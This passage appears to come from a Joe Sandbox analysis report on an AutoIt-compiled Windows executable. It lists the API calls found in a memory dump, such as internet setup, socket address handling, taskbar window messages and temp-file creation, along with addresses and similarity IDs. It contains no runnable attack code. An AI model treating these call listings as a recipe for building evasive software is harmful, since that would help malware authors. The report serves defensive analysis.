                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050544C
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00505475
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E4557
                                                                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 004E463E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                              • String ID: (W
                                                                                                                                                                              • API String ID: 3761405300-2310960208
                                                                                                                                                                              APIs
                                                                                                                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0050AD32
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: htonsinet_addr
                                                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004EC5E5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 004EC4E1
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 004EC562
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                                                                              APIs
                                                                                                                                                                              • __umatherr.LIBCMT ref: 004DDA2A
                                                                                                                                                                                • Part of subcall function 004DDD86: __ctrlfp.LIBCMT ref: 004DDDE5
                                                                                                                                                                              • __ctrlfp.LIBCMT ref: 004DDA47
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __ctrlfp$__umatherr
                                                                                                                                                                              • String ID: xnR
                                                                                                                                                                              • API String ID: 219961500-3686307339
                                                                                                                                                                              APIs
                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004EB36B
                                                                                                                                                                                • Part of subcall function 004D2011: _doexit.LIBCMT ref: 004D201B
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message_doexit
                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0052BAB8
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0052BCAB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                              • String ID: WIN_XPe
                                                                                                                                                                              • API String ID: 510247158-3257408948
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005184DF
                                                                                                                                                                              • PostMessageW.USER32(00000000), ref: 005184E6
                                                                                                                                                                                • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051849F
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005184B2
                                                                                                                                                                                • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004FD01E
                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004FD035
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                              • String ID: aut
                                                                                                                                                                              • API String ID: 3285503233-3010740371